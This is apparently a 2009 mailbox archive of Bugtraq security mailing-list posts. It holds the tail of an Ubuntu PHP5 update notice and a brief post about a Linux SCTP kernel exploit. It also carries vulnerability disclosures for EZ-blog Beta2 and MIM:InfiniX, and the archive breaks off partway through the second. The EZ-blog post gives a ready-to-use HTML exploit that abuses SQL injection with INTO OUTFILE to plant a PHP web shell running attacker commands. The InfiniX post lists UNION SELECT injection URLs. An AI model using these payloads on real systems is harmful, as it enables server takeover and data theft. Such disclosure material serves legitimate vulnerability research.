      Size/MD5:   362964 dcf12bc532749a7622715ebaf9651ea1
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-gd_5.2.6.dfsg.1-3ubuntu4.1_i386.deb
      Size/MD5:    32522 acd974f6188a2c0b5f07b52f3a2c77f0
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-gmp_5.2.6.dfsg.1-3ubuntu4.1_i386.deb
      Size/MD5:    14124 a49e6ff7dd2eb32e3d4e1d70456b56ec
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-ldap_5.2.6.dfsg.1-3ubuntu4.1_i386.deb
      Size/MD5:    18338 7bbdfa46a64072e989361edcf64dd7c5
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mhash_5.2.6.dfsg.1-3ubuntu4.1_i386.deb
      Size/MD5:     5330 e549dcbde29491c86bbf78dbd61e273c
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mysql_5.2.6.dfsg.1-3ubuntu4.1_i386.deb
      Size/MD5:    65948 cf343006d3ac73ca192a1913f270e97f
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-odbc_5.2.6.dfsg.1-3ubuntu4.1_i386.deb
      Size/MD5:    34832 e21b4a78220d4270f771aed92ef68741
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-pgsql_5.2.6.dfsg.1-3ubuntu4.1_i386.deb
      Size/MD5:    52834 87b10921ab7d947a35d071c6d76633f7
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-pspell_5.2.6.dfsg.1-3ubuntu4.1_i386.deb
      Size/MD5:     8626 9972fba3fe212daf5b20c98b4814aafc
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-recode_5.2.6.dfsg.1-3ubuntu4.1_i386.deb
      Size/MD5:     4898 657f32b9c5658d29f125ab23e07adec3
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-snmp_5.2.6.dfsg.1-3ubuntu4.1_i386.deb
      Size/MD5:    11878 94da3c1ffa370c28a717b9b3f6cc1948
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sqlite_5.2.6.dfsg.1-3ubuntu4.1_i386.deb
      Size/MD5:    34786 11a1a1bcb8e9d23e4e42df96d193463d
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sybase_5.2.6.dfsg.1-3ubuntu4.1_i386.deb
      Size/MD5:    26264 e29efc30232b6a07a8b4103ba6398b71
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-tidy_5.2.6.dfsg.1-3ubuntu4.1_i386.deb
      Size/MD5:    16538 9515236280c98ecaabb10e7ee3fd42da
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xmlrpc_5.2.6.dfsg.1-3ubuntu4.1_i386.deb
      Size/MD5:    36554 73c041f424542db14e7a4854afd17a0a
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xsl_5.2.6.dfsg.1-3ubuntu4.1_i386.deb
      Size/MD5:    12818 e7c13b1b226022484b125217e944131b
    http://security.ubuntu.com/ubuntu/pool/universe/p/php5/libapache2-mod-php5filter_5.2.6.dfsg.1-3ubuntu4.1_i386.deb
      Size/MD5:  2481784 06a21c3e024d3ec1f305b906ec30ffa2

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/p/php5/libapache2-mod-php5_5.2.6.dfsg.1-3ubuntu4.1_lpia.deb
      Size/MD5:  2456920 a424415cd0847a960129ec9cbae3edbc
    http://ports.ubuntu.com/pool/main/p/php5/php5-cgi_5.2.6.dfsg.1-3ubuntu4.1_lpia.deb
      Size/MD5:  4884544 d79e0b1af77ebe187739e62d153eb91f
    http://ports.ubuntu.com/pool/main/p/php5/php5-cli_5.2.6.dfsg.1-3ubuntu4.1_lpia.deb
      Size/MD5:  2463180 56c1a6e0c0ca3c007f34327d7ae0b544
    http://ports.ubuntu.com/pool/main/p/php5/php5-common_5.2.6.dfsg.1-3ubuntu4.1_lpia.deb
      Size/MD5:   367832 9154e91aa26fe80ab0046e4a2f8815b3
    http://ports.ubuntu.com/pool/main/p/php5/php5-curl_5.2.6.dfsg.1-3ubuntu4.1_lpia.deb
      Size/MD5:    23458 a5fe520ffc00fd949b8c133534eabb64
    http://ports.ubuntu.com/pool/main/p/php5/php5-dbg_5.2.6.dfsg.1-3ubuntu4.1_lpia.deb
      Size/MD5:  8581302 a9cd1c9b816f366ffecbd02bf17d5a54
    http://ports.ubuntu.com/pool/main/p/php5/php5-dev_5.2.6.dfsg.1-3ubuntu4.1_lpia.deb
      Size/MD5:   362964 7e58d9e81ddc3b89a301615266c19709
    http://ports.ubuntu.com/pool/main/p/php5/php5-gd_5.2.6.dfsg.1-3ubuntu4.1_lpia.deb
      Size/MD5:    32318 9d897b0c2cd10978cdd0722de276830e
    http://ports.ubuntu.com/pool/main/p/php5/php5-gmp_5.2.6.dfsg.1-3ubuntu4.1_lpia.deb
      Size/MD5:    14188 fb56f5c046241ed21696bffab8be01f8
    http://ports.ubuntu.com/pool/main/p/php5/php5-ldap_5.2.6.dfsg.1-3ubuntu4.1_lpia.deb
      Size/MD5:    18212 834b6733a261346c4652c11d9a72b7f5
    http://ports.ubuntu.com/pool/main/p/php5/php5-mhash_5.2.6.dfsg.1-3ubuntu4.1_lpia.deb
      Size/MD5:     5178 5406fb2847c88b126c57f70d6746139e
    http://ports.ubuntu.com/pool/main/p/php5/php5-mysql_5.2.6.dfsg.1-3ubuntu4.1_lpia.deb
      Size/MD5:    64530 5278e62e2100ed871a377653e6bdb08f
    http://ports.ubuntu.com/pool/main/p/php5/php5-odbc_5.2.6.dfsg.1-3ubuntu4.1_lpia.deb
      Size/MD5:    34390 47dd8ede5553adcd2ef38149b94087bc
    http://ports.ubuntu.com/pool/main/p/php5/php5-pgsql_5.2.6.dfsg.1-3ubuntu4.1_lpia.deb
      Size/MD5:    52132 05c7630ebec3174f692ada53383f65ce
    http://ports.ubuntu.com/pool/main/p/php5/php5-pspell_5.2.6.dfsg.1-3ubuntu4.1_lpia.deb
      Size/MD5:     8566 13a0ac8422a7e05fbaaf6f1b24f12b9b
    http://ports.ubuntu.com/pool/main/p/php5/php5-recode_5.2.6.dfsg.1-3ubuntu4.1_lpia.deb
      Size/MD5:     4842 eb7f8a91d2661f376b10dff10e61cc0e
    http://ports.ubuntu.com/pool/main/p/php5/php5-snmp_5.2.6.dfsg.1-3ubuntu4.1_lpia.deb
      Size/MD5:    11748 3bb842f7d465d3aeedf48c097151e628
    http://ports.ubuntu.com/pool/main/p/php5/php5-sqlite_5.2.6.dfsg.1-3ubuntu4.1_lpia.deb
      Size/MD5:    34094 6dd49405c4f662d8d7fe73a0dbfd02ef
    http://ports.ubuntu.com/pool/main/p/php5/php5-sybase_5.2.6.dfsg.1-3ubuntu4.1_lpia.deb
      Size/MD5:    26194 619a06ed77adb836a6a0c461c7a6443d
    http://ports.ubuntu.com/pool/main/p/php5/php5-tidy_5.2.6.dfsg.1-3ubuntu4.1_lpia.deb
      Size/MD5:    16388 801e4734a078951f59bf293290e809a9
    http://ports.ubuntu.com/pool/main/p/php5/php5-xmlrpc_5.2.6.dfsg.1-3ubuntu4.1_lpia.deb
      Size/MD5:    36034 260975149d9a15cb2d1e508eb883a59e
    http://ports.ubuntu.com/pool/main/p/php5/php5-xsl_5.2.6.dfsg.1-3ubuntu4.1_lpia.deb
      Size/MD5:    12714 c62bc8d175f9116669dc2c884b7acc75
    http://ports.ubuntu.com/pool/universe/p/php5/libapache2-mod-php5filter_5.2.6.dfsg.1-3ubuntu4.1_lpia.deb
      Size/MD5:  2455750 c0daaf7b48a7dd093655b26bb4089c5f

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/main/p/php5/libapache2-mod-php5_5.2.6.dfsg.1-3ubuntu4.1_powerpc.deb
      Size/MD5:  2615954 4667cf91b73ce531a2b893f6b9753462
    http://ports.ubuntu.com/pool/main/p/php5/php5-cgi_5.2.6.dfsg.1-3ubuntu4.1_powerpc.deb
      Size/MD5:  5082566 39789f53e78b53ad8e267ff6ccd16b80
    http://ports.ubuntu.com/pool/main/p/php5/php5-cli_5.2.6.dfsg.1-3ubuntu4.1_powerpc.deb
      Size/MD5:  2565540 59766a0d506b6c740af4bddaef0cf42d
    http://ports.ubuntu.com/pool/main/p/php5/php5-common_5.2.6.dfsg.1-3ubuntu4.1_powerpc.deb
      Size/MD5:   374746 c966cccdf0476d3c28523e72aa4337b1
    http://ports.ubuntu.com/pool/main/p/php5/php5-curl_5.2.6.dfsg.1-3ubuntu4.1_powerpc.deb
      Size/MD5:    28202 8a4528a808d23e58ae3ac2f215e33830
    http://ports.ubuntu.com/pool/main/p/php5/php5-dbg_5.2.6.dfsg.1-3ubuntu4.1_powerpc.deb
      Size/MD5:  9025824 e74665f1cd9ff30d3f532ccc877c92a0
    http://ports.ubuntu.com/pool/main/p/php5/php5-dev_5.2.6.dfsg.1-3ubuntu4.1_powerpc.deb
      Size/MD5:   362970 060057ddcbc44003943f53e3cbae2243
    http://ports.ubuntu.com/pool/main/p/php5/php5-gd_5.2.6.dfsg.1-3ubuntu4.1_powerpc.deb
      Size/MD5:    38308 e6940a89e931092549d15140c35a302f
    http://ports.ubuntu.com/pool/main/p/php5/php5-gmp_5.2.6.dfsg.1-3ubuntu4.1_powerpc.deb
      Size/MD5:    16998 7b1466764a5f52650437cdf341c73426
    http://ports.ubuntu.com/pool/main/p/php5/php5-ldap_5.2.6.dfsg.1-3ubuntu4.1_powerpc.deb
      Size/MD5:    21756 ae21faef6db62c26f1670569caf4092b
    http://ports.ubuntu.com/pool/main/p/php5/php5-mhash_5.2.6.dfsg.1-3ubuntu4.1_powerpc.deb
      Size/MD5:     7742 2eb03375b102e1aff9439aa82095ba9f
    http://ports.ubuntu.com/pool/main/p/php5/php5-mysql_5.2.6.dfsg.1-3ubuntu4.1_powerpc.deb
      Size/MD5:    77174 3032a0558ef85b6c61e7a322453773f3
    http://ports.ubuntu.com/pool/main/p/php5/php5-odbc_5.2.6.dfsg.1-3ubuntu4.1_powerpc.deb
      Size/MD5:    41584 eb380952374e64956419987c5c8171ae
    http://ports.ubuntu.com/pool/main/p/php5/php5-pgsql_5.2.6.dfsg.1-3ubuntu4.1_powerpc.deb
      Size/MD5:    60734 095dd8e18f05d60d5bbc0f0400964eee
    http://ports.ubuntu.com/pool/main/p/php5/php5-pspell_5.2.6.dfsg.1-3ubuntu4.1_powerpc.deb
      Size/MD5:    11116 250ce4c74efd771035346d6af4327d66
    http://ports.ubuntu.com/pool/main/p/php5/php5-recode_5.2.6.dfsg.1-3ubuntu4.1_powerpc.deb
      Size/MD5:     7280 4a7dd508624283da85a24b9eef797af5
    http://ports.ubuntu.com/pool/main/p/php5/php5-snmp_5.2.6.dfsg.1-3ubuntu4.1_powerpc.deb
      Size/MD5:    14404 19dadcd88db18253090e1bcaab1441a9
    http://ports.ubuntu.com/pool/main/p/php5/php5-sqlite_5.2.6.dfsg.1-3ubuntu4.1_powerpc.deb
      Size/MD5:    42586 10b84491dcb67ea8f15ed8b3f3640fae
    http://ports.ubuntu.com/pool/main/p/php5/php5-sybase_5.2.6.dfsg.1-3ubuntu4.1_powerpc.deb
      Size/MD5:    31290 a9e1ae9f57c90f9322dfb12d28dd3f2a
    http://ports.ubuntu.com/pool/main/p/php5/php5-tidy_5.2.6.dfsg.1-3ubuntu4.1_powerpc.deb
      Size/MD5:    20004 92d9441fc12647e63c3641b2b525c29f
    http://ports.ubuntu.com/pool/main/p/php5/php5-xmlrpc_5.2.6.dfsg.1-3ubuntu4.1_powerpc.deb
      Size/MD5:    40802 e5d06c3d8cc351213be8cfe218e96d8d
    http://ports.ubuntu.com/pool/main/p/php5/php5-xsl_5.2.6.dfsg.1-3ubuntu4.1_powerpc.deb
      Size/MD5:    16024 d2f30337d678b6b58fb9661f52a25385
    http://ports.ubuntu.com/pool/universe/p/php5/libapache2-mod-php5filter_5.2.6.dfsg.1-3ubuntu4.1_powerpc.deb
      Size/MD5:  2614826 4622aa05456f72bee8be5b4246af1e43

  sparc architecture (Sun SPARC/UltraSPARC):

    http://ports.ubuntu.com/pool/main/p/php5/libapache2-mod-php5_5.2.6.dfsg.1-3ubuntu4.1_sparc.deb
      Size/MD5:  2472736 82c79436511f4bfe38a82f6ffde4ad6e
    http://ports.ubuntu.com/pool/main/p/php5/php5-cgi_5.2.6.dfsg.1-3ubuntu4.1_sparc.deb
      Size/MD5:  4839728 ee41a597f8258ce11dacdfb8874d9177
    http://ports.ubuntu.com/pool/main/p/php5/php5-cli_5.2.6.dfsg.1-3ubuntu4.1_sparc.deb
      Size/MD5:  2440022 093bd1148308fa06722ba2c6363ee7f8
    http://ports.ubuntu.com/pool/main/p/php5/php5-common_5.2.6.dfsg.1-3ubuntu4.1_sparc.deb
      Size/MD5:   368112 3671bdd02b77a72e6a8a926166ab7c52
    http://ports.ubuntu.com/pool/main/p/php5/php5-curl_5.2.6.dfsg.1-3ubuntu4.1_sparc.deb
      Size/MD5:    24366 e307ee44bcc3d51af50b2799b949b2fa
    http://ports.ubuntu.com/pool/main/p/php5/php5-dbg_5.2.6.dfsg.1-3ubuntu4.1_sparc.deb
      Size/MD5:  8416226 dff52795098e3ebc6b2f67bb7b503c8b
    http://ports.ubuntu.com/pool/main/p/php5/php5-dev_5.2.6.dfsg.1-3ubuntu4.1_sparc.deb
      Size/MD5:   362954 f1de2986e7ea129945ad1ec088fb63c8
    http://ports.ubuntu.com/pool/main/p/php5/php5-gd_5.2.6.dfsg.1-3ubuntu4.1_sparc.deb
      Size/MD5:    33102 bb320ddf22d00aaed80270a73c2fd769
    http://ports.ubuntu.com/pool/main/p/php5/php5-gmp_5.2.6.dfsg.1-3ubuntu4.1_sparc.deb
      Size/MD5:    13304 90e7c80394e2460c56cdd724d1313ea4
    http://ports.ubuntu.com/pool/main/p/php5/php5-ldap_5.2.6.dfsg.1-3ubuntu4.1_sparc.deb
      Size/MD5:    17566 a6ea835dca77e0a63f616d81cf97ef15
    http://ports.ubuntu.com/pool/main/p/php5/php5-mhash_5.2.6.dfsg.1-3ubuntu4.1_sparc.deb
      Size/MD5:     5144 fb434cc86486158bd06ce24e9af8f9ac
    http://ports.ubuntu.com/pool/main/p/php5/php5-mysql_5.2.6.dfsg.1-3ubuntu4.1_sparc.deb
      Size/MD5:    63470 09004ee1b8dfc4e32d71d3a9c3d6cc23
    http://ports.ubuntu.com/pool/main/p/php5/php5-odbc_5.2.6.dfsg.1-3ubuntu4.1_sparc.deb
      Size/MD5:    32856 6d4724a80b9445dfbed1e5df1af6a253
    http://ports.ubuntu.com/pool/main/p/php5/php5-pgsql_5.2.6.dfsg.1-3ubuntu4.1_sparc.deb
      Size/MD5:    49968 83c2f54f9c3e10ff5e3d9e5436971e47
    http://ports.ubuntu.com/pool/main/p/php5/php5-pspell_5.2.6.dfsg.1-3ubuntu4.1_sparc.deb
      Size/MD5:     8360 fd4b7e3db8fadd0487c940726cd4cc23
    http://ports.ubuntu.com/pool/main/p/php5/php5-recode_5.2.6.dfsg.1-3ubuntu4.1_sparc.deb
      Size/MD5:     4822 e9277729f259e41f1aa6efd360c19bcb
    http://ports.ubuntu.com/pool/main/p/php5/php5-snmp_5.2.6.dfsg.1-3ubuntu4.1_sparc.deb
      Size/MD5:    11702 ebc5d76c556adcab8bdbd0315cfda105
    http://ports.ubuntu.com/pool/main/p/php5/php5-sqlite_5.2.6.dfsg.1-3ubuntu4.1_sparc.deb
      Size/MD5:    32692 0b667ec764aa4f90f42754a286f4bbaa
    http://ports.ubuntu.com/pool/main/p/php5/php5-sybase_5.2.6.dfsg.1-3ubuntu4.1_sparc.deb
      Size/MD5:    24908 2fff13c6714eabb9e285dba23bc38450
    http://ports.ubuntu.com/pool/main/p/php5/php5-tidy_5.2.6.dfsg.1-3ubuntu4.1_sparc.deb
      Size/MD5:    16494 becdacb0fb6dcd78a75d661ee1d10d45
    http://ports.ubuntu.com/pool/main/p/php5/php5-xmlrpc_5.2.6.dfsg.1-3ubuntu4.1_sparc.deb
      Size/MD5:    35170 ddef1f8294043edc2cbf039d38613d7e
    http://ports.ubuntu.com/pool/main/p/php5/php5-xsl_5.2.6.dfsg.1-3ubuntu4.1_sparc.deb
      Size/MD5:    12298 286dd5841c526e1c982d28dcf777dd63
    http://ports.ubuntu.com/pool/universe/p/php5/libapache2-mod-php5filter_5.2.6.dfsg.1-3ubuntu4.1_sparc.deb
      Size/MD5:  2471106 7b973db41c27f33856991524efc4630b



--=-YJVxDWSNOYIDe9YAAfM9
Content-Type: application/pgp-signature; name="signature.asc"
Content-Description: This is a digitally signed message part

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iEYEABECAAYFAkn2IqUACgkQLMAs/0C4zNrmMgCgstYnq2Rml+Xgis2wAth//olB
bFUAoI38rP6OQ5A1uzhzZsm0HM6uERGg
=/xhc
-----END PGP SIGNATURE-----

--=-YJVxDWSNOYIDe9YAAfM9--

From - Tue Apr 28 12:58:31 2009
X-Account-Key: account7
X-UIDL: 4909bb8c0000758b
X-Mozilla-Status: 0000
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-40160-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 0DF42EC177
for <lists@securityspace.com>; Tue, 28 Apr 2009 12:51:55 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id E334D1440CD; Tue, 28 Apr 2009 09:05:10 -0600 (MDT)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 5945 invoked from network); 27 Apr 2009 23:48:29 -0000
MIME-Version: 1.0
Content-class: 
Message-ID: <1bca01c9c793$d637f06c$24a052c6@cc.w2k.vt.edu>
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
From: "Memisyazici, Aras" <arasm@vt.edu>
Subject: RE: SQL INJECTION (SHELL UPLOAD)--EZ-blog Beta2-->
thread-index: AcnHk9Y3uZu2vWymRFWX2uZuGu3jSw=thread-topic: SQL INJECTION (SHELL UPLOAD)--EZ-blog Beta2-->
X-MIMEOLE: Produced By Microsoft Exchange V6.5
Date: Mon, 27 Apr 2009 19:56:59 -0400
Importance: normal
X-Priority: 3
To: <y3nh4ck3r@gmail.com>, <bugtraq@securityfocus.com>
X-OriginalArrivalTime: 27 Apr 2009 23:56:52.0274 (UTC) FILETIME=[D6174920:01C9C793]
Status:   

This shell upload hack assumes the mySQL account running the E-Z-Blog has file create capabilities. If an admin does NOT tweak the running account and allows for this privilege then they are pretty much asking for it, wouldn't you agree? ;)

Aras 'Russ' Memisyazici
Systems Administrator
Office of Research
Virginia Tech


-----Original Message-----
From: y3nh4ck3r@gmail.com <y3nh4ck3r@gmail.com>
Sent: Monday, April 27, 2009 12:42 PM
To: bugtraq@securityfocus.com <bugtraq@securityfocus.com>
Subject: SQL INJECTION (SHELL UPLOAD)--EZ-blog Beta2-->

-------------------------------------------------
SQL INJECTION VULNERABILITY --EZ-blog Beta2-->                     
-------------------------------------------------

CMS INFORMATION:

-->WEB: http://sourceforge.net/projects/ez-blog/
-->DOWNLOAD: http://sourceforge.net/projects/ez-blog/
-->DEMO: N/A
-->CATEGORY: CMS / Blogging
-->DESCRIPTION: EZ-Blog is an open-source blog program written in PHP.
Presently, only MySQL is supported, but a PostgreSQL version is planned.
-->RELEASED: 2009-04-26

CMS VULNERABILITY:

-->TESTED ON: firefox 3
-->DORK: N/A
-->CATEGORY: SQL INJECTION (SHELL UPLOAD)
-->AFFECT VERSION: <=1 Beta2
-->Discovered Bug date: 2009-04-26
-->Reported Bug date: 2009-04-27
-->Fixed bug date: Not fixed
-->Info patch: Not fixed
-->Author: YEnH4ckEr
-->mail: y3nh4ck3r[at]gmail[dot]com
-->WEB/BLOG: N/A
-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo.
-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)


#########################
////////////////////////

SQL INJECTION (SQLi):

////////////////////////
#########################


<<<<---------++++++++++++++ Condition: magic_quotes_gpc=off +++++++++++++++++--------->>>>


-------
INTRO:
-------


An exploit was published by drosophila with Multiple SQL Injection in EZ-blog Beta-1, 
they (apparently) fixed it but the system is still vulnerable.


-----------
FILE VULN:
-----------

Path --> [HOME_PATH]/public/specific.php

..

$whichcategory = Trim($_POST['category']);

..
if ($whichcategory=='All'){
$query  = "SELECT * FROM content ORDER BY id DESC";
}else{
$query  = "SELECT * FROM content WHERE  topic ='" . $whichcategory . "' ORDER BY id DESC";
}
$result = mysql_query($query);
..


------------------
PROOF OF CONCEPT:
------------------

Copy and save --> PoC.html.
Configure --> HOST, HOME_PATH

<html>
<title>
PoC BY Y3NH4CK3R --PROUD TO BE SPANISH-->
</title>
<h1>
Click "Execute PoC" to launch the proof of concept (SQLi)...
</h1>
<body bgcolor=#000000 text=#ffffff>
<form method="post" action="http:[HOST]/[HOME_PATH]/public/specific.php">
<input type="hidden" name="category" value="-1' union all select version(),version(),version(),version(),version(),version(),version(),version()/*">
<input name="submit" value="Execute PoC" type="submit">
</form>
<br>
<br>
<h2>
<font color=#ff0000>
BY y3nh4ck3r. Contact: y3nh4ck3r@gmail.com
</font>
</h2>
</body>
</html>


------------------------
EXPLOIT (SHELL UPLOAD):
------------------------

This aplication hasn't admin authentication using DB, ie, admin panel uses .htaccess file. 
This is a complete exploit: SQL Injection --> Shell Upload, and XSS...all in one ;)

Copy and save --> exploit.html.
Configure --> HOST, HOME_PATH and COMPLETE-PATH.


<html>
<title>
PoC BY Y3NH4CK3R --PROUD TO BE SPANISH-->
</title>
<h1>
Click "Upload shell" to launch the exploit (SQLi)...
</h1>
<body bgcolor=#000000 text=#ffffff>
<form method="post" action="http://[HOST]/[HOME_PATH]/public/specific.php">
<input type="hidden" name="category" value="-1' union all select '<HTML><title>SHELL BY --Y3NH4CK3R--></title><body text=#ffffff bgcolor=#000000><center><h1>','YOUR SHELL IS ON!<br></h1></center><br><br>','<font color=#ff0000><h2>Get var (cmd) to execute comands. Enjoy it!</h2></font>','<script>alert(String.fromCharCode(67,111,109,109,97,110,100,32,101,120,101,99,117,116,101,100,33))</script>','<h3>Command Result:</h3>','<?php system($_GET[cmd]); ?>','<br><br><font color=#ff0000><h3>By y3nh4ck3r. Contact: y3nh4ck3r@gmail.com</h3></font></body>','</HTML>' INTO OUTFILE '[COMPLETE-PATH]/public/shell.php'/*">
<input name="submit" value="Upload shell" type="submit">
</form><br>
<h3>
Your shell in "http://[HOST]/[HOME_PATH]/public/shell.php"
</h3>
<br>
<h2>
<font color=#ff0000>
BY y3nh4ck3r. Contact: y3nh4ck3r@gmail.com
</font>
</h2>
</body>
</html>


Your shell in --> http://[HOST]/[HOME_PATH]/public/shell.php


#######################################################################
#######################################################################
##*******************************************************************##
##           ESPECIAL GREETZ TO: Str0ke, JosS, drosophila ...        ##
##*******************************************************************##
##-------------------------------------------------------------------##
##*******************************************************************##
##              GREETZ TO: SPANISH H4ck3Rs community!                ##
##*******************************************************************##
#######################################################################
#######################################################################

From - Tue Apr 28 13:08:31 2009
X-Account-Key: account7
X-UIDL: 4909bb8c0000758c
X-Mozilla-Status: 0000
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-40165-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 889BCEC177
for <lists@securityspace.com>; Tue, 28 Apr 2009 12:59:30 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id D2CB1144552; Tue, 28 Apr 2009 09:10:02 -0600 (MDT)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 20804 invoked from network); 28 Apr 2009 14:01:39 -0000
Message-ID: <49F70DA1.5050402@linuxbox.org>
Date: Tue, 28 Apr 2009 17:07:29 +0300
From: Gadi Evron <ge@linuxbox.org>
User-Agent: Thunderbird 2.0.0.21 (Macintosh/20090302)
MIME-Version: 1.0
To: funsec <funsec@linuxbox.org>,
code-crunchers@whitestar.linuxbox.org,
exploits@whitestar.linuxbox.org, fuzzing@whitestar.linuxbox.org,
full-disclosure@lists.grok.org.uk, bugtraq@securityfocus.com
Subject: one shot remote root for linux?
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
X-Greylist: Sender succeded SMTP AUTH authentication, not delayed by milter-greylist-1.7.5 (linuxbox.org [24.155.83.21]); Tue, 28 Apr 2009 09:09:39 -0500 (CDT)
Status:   

Sometimes news finds us in mysterious yet obvious ways.

HD set a status which I noticed on my twitter:

@hdmoore reading through sctp_houdini.c - one-shot remote linux kernel
root - http://kernelbof.blogspot.com/

I asked him about it on IM, wondering if it is real:
"looks like that
but requires a sctp app to be running"

Naturally, I retweeted.

Signed,

@gadievron

From - Tue Apr 28 13:08:32 2009
X-Account-Key: account7
X-UIDL: 4909bb8c0000758d
X-Mozilla-Status: 0000
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-40166-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id C209DEC175
for <lists@securityspace.com>; Tue, 28 Apr 2009 13:07:53 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id EEA3B144553; Tue, 28 Apr 2009 09:10:26 -0600 (MDT)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 20920 invoked from network); 28 Apr 2009 14:09:20 -0000
Date: 28 Apr 2009 14:14:49 -0000
Message-ID: <20090428141449.12204.qmail@securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.411 (Entity 5.404)
From: y3nh4ck3r@gmail.com
To: bugtraq@securityfocus.com
Subject: MULTIPLE REMOTE SQL INJECTION VULNERABILITIES---MIM:InfiniX
 v1.2.003--->
Status:   

--------------------------------------------------------------------------
MULTIPLE REMOTE SQL INJECTION VULNERABILITIES --MIM:InfiniX v1.2.003-->
--------------------------------------------------------------------------

CMS INFORMATION:

-->WEB: http://mim.infinix.it
-->DOWNLOAD: https://sourceforge.net/projects/infinix/
-->DEMO: http://mim.infinix.it
-->CATEGORY: CMS / Portal
-->DESCRIPTION: MIM:InfiniX Manuale Intermediale della Modernita': Infinite Info...
in Xml PHP-XHTML-XML-XSL-CSS-AJAX-RDF. Design your CMS and store...
-->RELEASED: 2009-04-21

CMS VULNERABILITY:

-->TESTED ON: firefox 3
-->DORK: "Developed by rbk"
-->CATEGORY: MULTIPLE SQL INJECTION VULNERABILITIES
-->AFFECT VERSION: 1.2.003 (maybe <= ?)
-->Discovered Bug date: 2009-04-27
-->Reported Bug date: 2009-04-27
-->Fixed bug date: 2009-04-28
-->Info patch: v1.2.003
-->Author: YEnH4ckEr
-->mail: y3nh4ck3r[at]gmail[dot]com
-->WEB/BLOG: N/A
-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo.
-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)



#########################
////////////////////////

SQL INJECTION (SQLi):

////////////////////////
#########################


<<<<---------++++++++++++++ Condition: magic_quotes_gpc=off +++++++++++++++++--------->>>>


-------
INTRO:
-------


Admin choose to use database or not.

This CMS is completely vulnerable to SQL Injection (I only show some vars).



------------------
PROOF OF CONCEPT:
------------------


For example ("month" and "year" GET vars). Links:


http://[HOST]/[HOME_PATH]/index.php?mode╩lendar&selectedday&month=5&year 09%27+AND+0+UNION+ALL+SELECT+1,version(),database(),4,5,6/*

http://[HOST]/[HOME_PATH]/index.php?mode╩lendar&selectedday&month=5%27+AND+0+UNION+ALL+SELECT+1,version(),database(),4,5,6/*&year 09


Another example (search post form). Search this:


